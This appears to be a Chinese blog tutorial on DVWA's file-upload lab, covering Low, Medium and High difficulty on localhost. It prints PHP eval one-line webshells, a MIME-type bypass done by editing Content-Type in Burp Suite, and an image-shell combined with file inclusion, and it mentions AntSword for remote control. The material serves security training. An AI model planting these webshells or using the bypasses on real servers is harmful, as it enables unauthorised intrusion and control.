新之助
- 关注

文件上传漏洞配合文件包含漏洞使用可以+500的攻击力
shell:就是一个命令系统,类似Win下的cmd
Low级别:
1.我们直接点击浏览,上传一个shell.php后缀的文件,其内容为
<?php @eval($_POST["pass"])?>
是简单的PHP一句话木马
2.点击Uplaod提交后,可以看到直接就上传成功了,系统并为做任何的校验
当前URL为:http://127.0.0.1/security/DVWA/vulnerabilities/upload/#
上传的路径为:../../hackable/uploads/shell.php
直接拼接后得当前文件的上传路径为:http://127.0.0.1/security/DVWA/hackable/uploads/shell.php
3.接着我们可以通过shell管理工具直接连接
这里因为上传的是一个一句话的shell,所以直接拿蚁剑连接即可,打开蚁剑点击Add,添加一个Shell
输入刚才拼接好的上传路径,以及Shell的密码,然后再点击Add添加
然后就可以进行一系列操作,上传大马,下载文件,提权等
Medium级别:
1.首先我们选择一个脚本文件horse.php其内容为:
最原始的PHP一句话木马,密码为rootkit
<?php @eval($_GET['rootkit']);?>
点击Upload上传
可以看到并没有上传成功,对方使用了白名单过滤,只接收JPEG和PNG格式的图片
白名单:就是允许通过的一系列数据
黑名单:就是不允许通过的一系列数据
2.此时我们可以打开BurpSuite,开启代理,再次点击浏览选择horse.php文件点击Upload,回到Bp可以看到拦截到了上传的HTTP数据包,可以看到对数据包的文件大小、类型做了限制,因为我们上传的文件小于它的最大限制所以就不用管了
直接看Content-Type:application/octet-stream
该字段又叫MIME值表示文件的类型,因为我们上传的是一个.php的脚本文件所以此时为application/octet-stream
二进制数据流,其各式为
Content-Type:主类型/子类型
3.为了绕过它的白名单限制,我们就将该字段改成 image/png 代表当前上传的文件是图片类型,以欺骗检查修改MIME值后点击Forward放包
4.可以看到我们的horse.php文件上传成功了
此时URL:http://localhost/security/DVWA/vulnerabilities/upload/#
上传路径:../../hackable/uploads/horse.php
拼接路径:http://localhost/security/DVWA/hackable/uploads/horse.php
5.接着我们在蚁剑当中连接这个木马
可以看到连接成功了
High级别:
1.选择webshell.php文件点击Upload上传,其文件内容为
<?php @eval($_GET["root"])?>
可以看到上传失败了,对方做了限制,只接收JPEG或PNG的图片
2.我们首先猜测它是验证MIME值,因此我们需要通过抓包修改MIME值
使用Bp抓包后,可以看到此时下面的MIME值并不是一个图片的值
我们将其修改为imgae/png,放包后回到dvwa查看
可以看到并没有绕过限制
3.此时我们就可以考虑一下转行了!
呸!此时我们猜测它可能是做了后缀的检查
接着可以探测一下它的WEB环境,看一下WEB中间件的版本是否存在解析漏洞
或者在挖一下是否存在文件包含漏洞,假设这里存在一个文件包含漏洞
我们利用文件包含漏洞+图片马的方式绕过后缀检查
制作一个图片马:webshell.php,内容输入完后将其改为.jpg格式
GIF98a
<?php phpinfo();?>
关闭Bp的拦截,重新上传文件
可以看到上传成功了
此时URL为:http://localhost/security/DVWA/vulnerabilities/upload/#
上传路径为:../../hackable/uploads/webshell.jpg
拼接后的路径为:http://localhost/security/DVWA/hackable/uploads/webshell.jpg
5.接着我们修改dvwa的等级为low,来到隔壁File Inclusion模块
将拼接后得到的文件路径直接作为page参数被包含,可以看到成功读取到了我们上传的文件
page=http://localhost/security/DVWA/hackable/uploads/webshell.jpg
因为是文件包含漏洞所以我们只能对其进行进一步的信息收集,不断的读取各种文件
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
